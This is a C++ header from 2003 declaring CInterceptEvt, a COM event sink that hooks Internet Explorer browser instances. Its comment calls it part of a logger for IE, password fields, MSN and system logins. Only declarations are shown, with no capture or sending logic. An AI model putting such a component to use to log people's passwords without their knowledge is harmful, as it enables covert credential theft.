// InterceptEvt.h: interface for the CInterceptEvt class.
//
//////////////////////////////////////////////////////////////////////
/************************************
  REVISION LOG ENTRY
  Revision By: Zhang, Zhefu
  E-mail: codetiger@hotmail.com
  Revised on 7/3/2003 
  Comment: This is part of the logger for IE, password edit, MSN, system login.
           You are free to use to use the code on the base of keeping this comment
		   All rights reserved. May not be sold for profit.
 ************************************/
#if !defined WEB_EVENT_INTERCEPTOR
#define WEB_EVENT_INTERCEPTOR

#if _MSC_VER > 1000
#pragma once
#endif // _MSC_VER > 1000

//#include <Oaidl.h>
#include <Exdisp.h> //to use IWebBrowser2
#include "ComDef.h"

class CInterceptEvt : public IDispatch   
{
	// IUnknown
	ULONG __stdcall AddRef();
	ULONG __stdcall Release();
	HRESULT __stdcall QueryInterface(REFIID iid, void** ppv);

	// IDispatch
	HRESULT __stdcall GetTypeInfoCount(UINT* pCountTypeInfo);
	HRESULT __stdcall GetTypeInfo(UINT iTypeInfo, LCID lcid, ITypeInfo** ppITypeInfo);
	HRESULT __stdcall GetIDsOfNames(REFIID riid, LPOLESTR* rgszNames, UINT cNames, LCID lcid, DISPID* rgDispId);
	HRESULT __stdcall Invoke(DISPID dispIdMember, REFIID riid, LCID lcid, WORD wFlags, DISPPARAMS* pDispParams, VARIANT* pVarResult, EXCEPINFO* pExcepInfo, UINT* puArgErr);

private:
	ULONG m_cRef;
	ITypeInfo* m_pTypeInfo;

public:
	CInterceptEvt() : m_cRef(1) 
	{
		for(int i =0; i < MAX_BROWSER; i++)
		{
			m_ppBrowser[i] = NULL;
            m_ppConnectionPoint[i] = NULL;
		}
	}
	~CInterceptEvt() {}
	BOOL Init(void);

	//void SetSourceForm(MSHTML::IHTMLFormElementPtr pForm);
    //MSHTML::IHTMLFormElementPtr m_pForm;
	void SetSource(IWebBrowser2Ptr pBrowser, DWORD dwIndex);
	void ExitEvents(DWORD dwIndex);
	void ConnectEvents(DWORD dwIndex);
	
	IWebBrowser2Ptr m_ppBrowser[MAX_BROWSER]; 
	IConnectionPoint* m_ppConnectionPoint[MAX_BROWSER];
	DWORD m_dwCookie[MAX_BROWSER];
};

#endif // !defined(AFX_INTERCEPTEVT_H__BF80A58D_A463_4CB8_A117_850FB6FD0211__INCLUDED_)
